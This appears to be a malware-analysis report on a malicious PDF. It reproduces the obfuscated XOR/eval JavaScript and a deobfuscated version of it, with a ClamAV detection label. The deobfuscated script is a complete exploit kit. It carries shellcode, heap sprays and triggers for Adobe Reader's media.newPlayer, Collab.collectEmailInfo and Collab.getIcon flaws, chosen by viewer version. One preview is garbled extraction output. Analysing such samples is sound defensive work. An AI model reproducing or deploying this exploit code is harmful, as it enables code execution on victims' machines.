",8,86,69,82,127,65,82,82,65,89,123,16,125,28,24,9,92,92,8"; i6M5222S+= ",86,69,82,127,65,82,82,65,89,123,16,125,29,29,24,6,6,86,6"; i6M5222S+= "9,82,127,65,82,82,65,89,123,17,125,28,18,6,6,86,69,82,127"; i6M5222S+= ",65,82,82,65,89,123,18,125,28,18,9,9,0,91,45,42,41,67,79,"; i6M5222S+= "76,76,65,66,127,69,77,65,73,76,8,9,27,45,42,93,45,42,45,4"; i6M5222S+= "2,73,70,8,8,86,69,82,127,65,82,82,65,89,123,16,125,29,29,"; i6M5222S+= "24,6,6,86,69,82,127,65,82,82,65,89,123,17,125,28,17,6,6,8"; i6M5222S+= "6,69,82,127,65,82,82,65,89,123,18,125,28,19,9,92,92,8,86,"; i6M5222S+= "69,82,127,65,82,82,65,89,123,16,125,29,29,25,6,6,86,69,82"; i6M5222S+= ",127,65,82,82,65,89,123,17,125,28,17,9,9,91,45,42,41,67,7"; i6M5222S+= "9,76,76,65,66,127,71,69,84,73,67,79,78,8,9,27,45,42,93,45"; i6M5222S+= ",42,73,70,8,8,86,69,82,127,65,82,82,65,89,123,16,125,29,2"; i6M5222S+= "9,24,6,6,86,69,82,127,65,82,82,65,89,123,17,125,28,18,9,9"; i6M5222S+= "2,92,8,86,69,82,127,65,82,82,65,89,123,16,125,29,29,25,6,"; i6M5222S+= "6,86,69,82,127,65,82,82,65,89,123,17,125,28,19,9,9,91,45,"; i6M5222S+= "42,41,78,69,87,80,76,65,89,69,82,8,9,27,45,42,93,45,42,69"; i6M5222S+= ",76,83,69,91,93,45,42,45,42,93,45,42,80,68,70,127,67,72,6"; i6M5222S+= "9,67,75,127,86,69,82,83,8,9,27,45,42"; i6M5222S+= "]";; Fy0edSWX2=app["e"+"v"+""+""+"al"];Fy0edSWX2(i6M5222S); z77VLJi=C4HmQ5j;W0kE1s787x=''; Ec9oMvx=this.numPages; Y5tMaZ2=52; for (HcVjBV4apa=0;HcVjBV4apa<z77VLJi.length;HcVjBV4apa++){z77VLJi[HcVjBV4apa] ^=Ec9oMvx; z77VLJi[HcVjBV4apa] ^=Y5tMaZ2; W0kE1s787x +=String.fromCharCode(z77VLJi[HcVjBV4apa]);}Fy0edSWX2(W0kE1s787x);
|
|||
legacy_pdfkit_stage_000.js |
deobfuscated-js | numeric array XOR decoded JavaScript at offset 0x16F | 5326 bytes |
SHA-256: db5c1d3958e2b4bba5744133d69607db6a5ba2fb737c60c90a50a046de2b5d8f |
|||
Preview scriptFirst 1,000 lines of the extracted script
FUNCTION FIX IT YARSP LEN [WHILE YARSP LENGTH
LEN [YARSP YARSP ]YARSP YARSP SUBSTRING LEN RETURN YARSP ]-*FUNCTION NEWPLAYER [-*VAR SHELLCODE UNESCAPE U eb U b b Uc U Uafc U U b Ue a Uebfa Ue Uffea Uffff U c f Ua a Uf a U c Ua Ua a Ue d U daa Ubad U d b Uaece Ud d U d U a Ucd U d Ue e U Ud c Ue a U e Ud U d Ue e U Ud c U d Ucc Uffa Ufd e Ua a U a Uce f Uc c Ua a Ud ce Ucad Uf cb Ub U e d Ue e Ua a Ucea U ca Ua Ud ce Uc ce Uf ca Ub U e d U e Ua a U a Ue a U a d Uccf U e Ua f Ua Uc a Uc Uc de Ue Ua a Ua c U Uf f Uf f U f Uaaf U a d Uf f Uf f Uf f Uf U b Uaef Uf f Ud d U d a U d Ua de Uf Ud d Ua U Uef f U be U a U d U a U cb Ud U ae Uab d U ca U de U d Ud b Uf Uf d Ua Uc b Uaa d U ded Ubaf U ba Ua d Ua d U d Ufff U e U U Ue U aa U c Ufd c U ed Ud Ubc Ud U df Ubd Ud ce Ud d U c Ud Ud d U cd Ud U d U d U df Ud de U Ucfcd Uc df Ud d U Uced U d Ud d U bca Uc d Uf c Uc c Uf d Uc ca Uc df U d Ucec Ua b -*VAR BLOCK UNESCAPE U C C U C C -*VAR gdAGAcUYnFrsfZAszlo UNESCAPE U C C U C C U C C U C C U C C U C C U C C U C C U E U U U F U A E U D U B U B U U D U U B U U A U F U A E U E U A D U U U U U U U C U D U U -*WHILE BLOCK LENGTH BLOCK BLOCK -*BLOCK BLOCK SUBSTRING
SHELLCODE LENGTH -*MEMORY NEW aRRAY FOR I I X I [MEMORY{I} BLOCK SHELLCODE ]-*UTIL PRINTD RLPpPJtxxiNCuHWAGcZCUhFMKZoBbszdgnDc NEW dATE -*UTIL PRINTD sOTsXnqVmQknJjKixIOkLMFzyFMIpgGgnnkN NEW dATE -*TRY [THIS MEDIA NEWpLAYER NULL ] CATCH E []-*UTIL PRINTD gdAGAcUYnFrsfZAszlo NEW dATE ]-*-*FUNCTION COLLAB EMAIL [VAR SHELLCODE UNESCAPE U eb U b b Uc U Uafc U U b Ue a Uebfa Ue Uffea Uffff U c f Ua a Uf a U c Ua Ua a Ue d U daa Ubad U d b Uaece Ud d U d U a Ucd U d Ue e U Ud c Ue a U e Ud U d Ue e U Ud c U d Ucc Uffa Ufd e Ua a U a Uce f Uc c Ua a Ud ce Ucad Uf cb Ub U e d Ue e Ua a Ucea U ca Ua Ud ce Uc ce Uf ca Ub U e d U e Ua a U a Ue a U a d Uccf U e Ua f Ua Uc a Uc Uc de Ue Ua a Ua c U Uf f Uf f U f Uaaf U a d Uf f Uf f Uf f Uf U b Uaef Uf f Ud d U d a U d Ua de Uf Ud d Ua U Uef f U be U a U d U a U cb Ud U ae Uab d U ca U de U d Ud b Uf Uf d Ua Uc b Uaa d U ded Ubaf U ba Ua d Ua d U d Ufff U e U U Ue U aa U c Ufd c U ed Ud Ubc Ud U df Ubd Ud ce Ud d U c Ud Ud d U cd Ud U d U d U df Ud de U Ucfcd Uc df Ud d U Uced U d Ud d U bca Uc d Uf c Ucbc Ucfc U ca Ucec Ua b VAR MEM ARRAY NEW aRRAY VAR CC X C C C C VAR ADDR X VAR SC LEN SHELLCODE LENGTH
VAR LEN ADDR
SC LEN X VAR YARSP UNESCAPE U U YARSP FIX IT YARSP LEN VAR COUNT CC
X ADDR FOR VAR COUNT COUNT COUNT COUNT [MEM ARRAY{COUNT} YARSP SHELLCODE ]-*VAR OVERFLOW UNESCAPE U C C U C C WHILE OVERFLOW LENGTH [OVERFLOW OVERFLOW ]-*THIS COLLABsTORE cOLLAB COLLECTeMAILiNFO [SUBJ MSG OVERFLOW] ]-*-*FUNCTION COLLAB GETICON [IF APP DOC cOLLAB GETiCON [VAR ARRY NEW aRRAY VAR VVPETHYA UNESCAPE U eb U b b Uc U Uafc U U b Ue a Uebfa Ue Uffea Uffff U c f Ua a Uf a U c Ua Ua a Ue d U daa Ubad U d b Uaece Ud d U d U a Ucd U d Ue e U Ud c Ue a U e Ud U d Ue e U Ud c U d Ucc Uffa Ufd e Ua a U a Uce f Uc c Ua a Ud ce Ucad Uf cb Ub U e d Ue e Ua a Ucea U ca Ua Ud ce Uc ce Uf ca Ub U e d U e Ua a U a Ue a U a d Uccf U e Ua f Ua Uc a Uc Uc de Ue Ua a Ua c U Uf f Uf f U f Uaaf U a d Uf f Uf f Uf f Uf U b Uaef Uf f Ud d U d a U d Ua de Uf Ud d Ua U Uef f U be U a U d U a U cb Ud U ae Uab d U ca U de U d Ud b Uf Uf d Ua Uc b Uaa d U ded Ubaf U ba Ua d Ua d U d Ufff U e U U Ue U aa U c Ufd c U ed Ud Ubc Ud U df Ubd Ud ce Ud d U c Ud Ud d U cd Ud U d U d U df Ud de U Ucfcd Uc df Ud d U Uced U d Ud d U bca Uc d Uf c Uc c Ucfd Uc c U c Ucec Ua b VAR HwQ cn VVPETHYA LENGTH
VAR LEN X
HwQ cn X VAR YARSP UNESCAPE U U YARSP FIX IT YARSP LEN VAR P aJk F X C C C C
X X FOR VAR VQCqd Y VQCqd Y P aJk F VQCqd Y [ARRY{VQCqd Y} YARSP VVPETHYA ]-*VAR TumHnBgW UNESCAPE WHILE TumHnBgW LENGTH X [TumHnBgW TumHnBgW ]-*TumHnBgW n TumHnBgW APP DOC cOLLAB GETiCON TumHnBgW ]]-*-*FUNCTION PDF CHECK VERS [-*VAR VERSION APP VIEWERvERSION TOsTRING -*VERSION VERSION REPLACE |d G -*VAR VER ARRAY NEW aRRAY VERSION CHARaT VERSION CHARaT VERSION CHARaT -*-*IF VER ARRAY{ } \\ VER ARRAY{ } VER ARRAY{ } VER ARRAY{ } [-*)COLLAB EMAIL -*]-*-*IF VER ARRAY{ } VER ARRAY{ } VER ARRAY{ } \\ VER ARRAY{ } VER ARRAY{ } [-*)COLLAB GETICON -*]-*IF VER ARRAY{ } VER ARRAY{ } \\ VER ARRAY{ } VER ARRAY{ } [-*)NEWPLAYER -*]-*ELSE[]-*-*]-*PDF CHECK VERS -*
|
|||
legacy_pdfkit_stage_001.js |
deobfuscated-js | numPages XOR decoded JavaScript at offset 0x16F | 5326 bytes |
SHA-256: 7b037fa54190e770de0dcf95257be25307cfa7f02f349897a3cc5594440f0b09 |
|||
|
Detection
ClamAV:
Js.Exploit.Shellcode-18
Obfuscation or payload:
likely
Carved artifact contains 9 eval/decoder/string-building token(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
function fix_it(yarsp,len){while(yarsp.length*2<len){yarsp+=yarsp;}yarsp=yarsp.substring(0,len/2);return yarsp;}
function newplayer(){
var shellcode = unescape("%u11EB%u4B5B%uC933%u8166%uAFC9%u8001%u0B34%uE2A6%uEBFA%uE805%uFFEA%uFFFF%u7C4F%uA6A6%uF9A6%u07C2%uA696%uA6A6%uE62D%u2DAA%uBAD6%u2D0B%uAECE%uD62D%u2D86%u26A6%uCD98%u55D3%uE0E0%u9826%uD3C3%uE04A%u26E0%uD498%u51D3%uE0E0%u9826%uD3C8%u2D56%uCC51%uFFA5%uFD4E%uA6A6%u44A6%uCE5F%uC8C9%uA6A6%uD3CE%uCAD4%uF2CB%uB059%u4E2D%uE34E%uA6A6%uCEA6%u95CA%uA694%uD5CE%uC3CE%uF2CA%uB059%u4E2D%u974E%uA6A6%u25A6%uE64A%u7A2D%uCCF5%u59E6%uA2F0%uA261%uC7A5%uC388%uC0DE%uE261%uA2A5%uA6C3%u6695%uF6F6%uF1F5%u59F6%uAAF0%u7A2D%uF6F6%uF5F6%uF6F6%uF059%u59B6%uAEF0%uF0F7%uD32D%u2D9A%u88D2%uA5DE%uF053%uD02D%uA586%u9553%uEF6F%u0BE7%u63A5%u7D95%u18A9%u9CB6%uD270%u67AE%uAB6D%u7CA5%u4DE6%u9D57%uD3B9%uF841%uF82D%uA582%uC07B%uAA2D%u2DED%uBAF8%u7BA5%uA22D%uA52D%u0D63%uFFF8%u4E65%u5987%u5959%uE828%u4AA8%u6C95%uFD2C%u7ED8%uD544%uBC90%uD689%u1DF8%uBD47%uD2CE%uD6D2%u899C%uD789%uD5D6%u94CD%uD488%u89D3%u96D5%u91DF%uD7DE%u8994%uCFCD%uC5DF%uD5D7%u8896%uCED6%u99D6%uD6D5%u9BCA%uC2D6%uF9C0%uC3C8%uF6D1%uC7CA%uC3DF%u80D4%uCEC0%uA69B");
var block = unescape("%u0c0c%u0c0c");
var GDagaCuyNfRSFzaSZLO = unescape("%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u514e%u4865%u4844%u724f%u4a6e%u6d43%u4b51%u4b79%u7156%u4d41%u5944%u596b%u7979%u625a%u626f%u7a6e%u634e%u4a4d%u6341%u6253%u4154%u5670%u5543%u4273%u4c51%u576d%u5772%u5670");
while(block.length <= 32768) block+=block;
block=block.substring(0,32768 - shellcode.length);
memory=new Array();for(i=0;i<0x2000;i++) {memory[i]= block + shellcode;}
util.printd("rlpPpjTXXIncUhwagCzcuHfmkzObBSZDGNdC", new Date());
util.printd("SotSxNQvMqKNjJkIXioKlmfZYfmiPGgGNNKn", new Date());
try {this.media.newPlayer(null);} catch(e) {}
util.printd(GDagaCuyNfRSFzaSZLO, new Date());}
function collab_email(){var shellcode=unescape("%u11EB%u4B5B%uC933%u8166%uAFC9%u8001%u0B34%uE2A6%uEBFA%uE805%uFFEA%uFFFF%u7C4F%uA6A6%uF9A6%u07C2%uA696%uA6A6%uE62D%u2DAA%uBAD6%u2D0B%uAECE%uD62D%u2D86%u26A6%uCD98%u55D3%uE0E0%u9826%uD3C3%uE04A%u26E0%uD498%u51D3%uE0E0%u9826%uD3C8%u2D56%uCC51%uFFA5%uFD4E%uA6A6%u44A6%uCE5F%uC8C9%uA6A6%uD3CE%uCAD4%uF2CB%uB059%u4E2D%uE34E%uA6A6%uCEA6%u95CA%uA694%uD5CE%uC3CE%uF2CA%uB059%u4E2D%u974E%uA6A6%u25A6%uE64A%u7A2D%uCCF5%u59E6%uA2F0%uA261%uC7A5%uC388%uC0DE%uE261%uA2A5%uA6C3%u6695%uF6F6%uF1F5%u59F6%uAAF0%u7A2D%uF6F6%uF5F6%uF6F6%uF059%u59B6%uAEF0%uF0F7%uD32D%u2D9A%u88D2%uA5DE%uF053%uD02D%uA586%u9553%uEF6F%u0BE7%u63A5%u7D95%u18A9%u9CB6%uD270%u67AE%uAB6D%u7CA5%u4DE6%u9D57%uD3B9%uF841%uF82D%uA582%uC07B%uAA2D%u2DED%uBAF8%u7BA5%uA22D%uA52D%u0D63%uFFF8%u4E65%u5987%u5959%uE828%u4AA8%u6C95%uFD2C%u7ED8%uD544%uBC90%uD689%u1DF8%uBD47%uD2CE%uD6D2%u899C%uD789%uD5D6%u94CD%uD488%u89D3%u96D5%u91DF%uD7DE%u8994%uCFCD%uC5DF%uD5D7%u8896%uCED6%u99D6%uD6D5%u9BCA%uC2D6%uF9C0%uCBC3%uCFC7%u80CA%uCEC0%uA69B");var mem_array=new Array();var cc=0x0c0c0c0c;var addr=0x400000;var sc_len=shellcode.length*2;var len=addr-(sc_len+0x38);var yarsp=unescape("%u9090%u9090");yarsp=fix_it(yarsp,len);var count2=(cc-0x400000)/addr;for(var count=0;count<count2;count++){mem_array[count]=yarsp+shellcode;}
var overflow=unescape("%u0c0c%u0c0c");while(overflow.length<44952){overflow+=overflow;}
this.collabStore=Collab.collectEmailInfo({subj:"",msg:overflow});}
function collab_geticon(){if(app.doc.Collab.getIcon){var arry=new Array();var vvpethya=unescape("%u11EB%u4B5B%uC933%u8166%uAFC9%u8001%u0B34%uE2A6%uEBFA%uE805%uFFEA%uFFFF%u7C4F%uA6A6%uF9A6%u07C2%uA696%uA6A6%uE62D%u2DAA%uBAD6%u2D0B%uAECE%uD62D%u2D86%u26A6%uCD98%u55D3%uE0E0%u9826%uD3C3%uE04A%u26E0%uD498%u51D3%uE0E0%u9826%uD3C8%u2D56%uCC51%uFFA5%uFD4E%uA6A6%u44A6%uCE5F%uC8C9%uA6A6%uD3CE%uCAD4%uF2CB%uB059%u4E2D%uE34E%uA6A6%uCEA6%u95CA%uA694%uD5CE%uC3CE%uF2CA%uB059%u4E2D%u974E%uA6A6%u25A6%uE64A%u7A2D%uCCF5%u59E6%uA2F0%uA261%uC7A5%uC388%uC0DE%uE261%uA2A5%uA6C3%u6695%uF6F6%uF1F5%u59F6%uAAF0%u7A2D%uF6F6%uF5F6%uF6F6%uF059%u59B6%uAEF0%uF0F7%uD32D%u2D9A%u88D2%uA5DE%uF053%uD02D%uA586%u9553%uEF6F%u0BE7%u63A5%u7D95%u18A9%u9CB6%uD270%u67AE%uAB6D%u7CA5%u4DE6%u9D57%uD3B9%uF841%uF82D%uA582%uC07B%uAA2D%u2DED%uBAF8%u7BA5%uA22D%uA52D%u0D63%uFFF8%u4E65%u5987%u5959%uE828%u4AA8%u6C95%uFD2C%u7ED8%uD544%uBC90%uD689%u1DF8%uBD47%uD2CE%uD6D2%u899C%uD789%uD5D6%u94CD%uD488%u89D3%u96D5%u91DF%uD7DE%u8994%uCFCD%uC5DF%uD5D7%u8896%uCED6%u99D6%uD6D5%u9BCA%uC2D6%uF9C0%uC3C1%uCFD2%uC9C5%u80C8%uCEC0%uA69B");var hWq500CN=vvpethya.length*2;var len=0x400000-(hWq500CN+0x38);var yarsp=unescape("%u9090%u9090");yarsp=fix_it(yarsp,len);var p5AjK65f=(0x0c0c0c0c-0x400000)/0x400000;for(var vqcQD96y=0;vqcQD96y<p5AjK65f;vqcQD96y++){arry[vqcQD96y]=yarsp+vvpethya;}
var tUMhNbGw=unescape("%09");while(tUMhNbGw.length<0x4000){tUMhNbGw+=tUMhNbGw;}
tUMhNbGw="N."+tUMhNbGw;app.doc.Collab.getIcon(tUMhNbGw);}}
function pdf_check_vers(){
var version=app.viewerVersion.toString();
version=version.replace(/\D/g,'');
var ver_array=new Array(version.charAt(0),version.charAt(1),version.charAt(2));
if((ver_array[0]<8)||(ver_array[0]==8&&ver_array[1]<2&&ver_array[2]<2)) {
collab_email();
}
if((ver_array[0]==8&&ver_array[1]<1&&ver_array[2]<3)||(ver_array[0]==9&&ver_array[1]<1)){
collab_geticon();
}
if((ver_array[0]==8&&ver_array[1]<2)||(ver_array[0]==9&&ver_array[1]<3)){
newplayer();
}
else{}
}
pdf_check_vers();
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.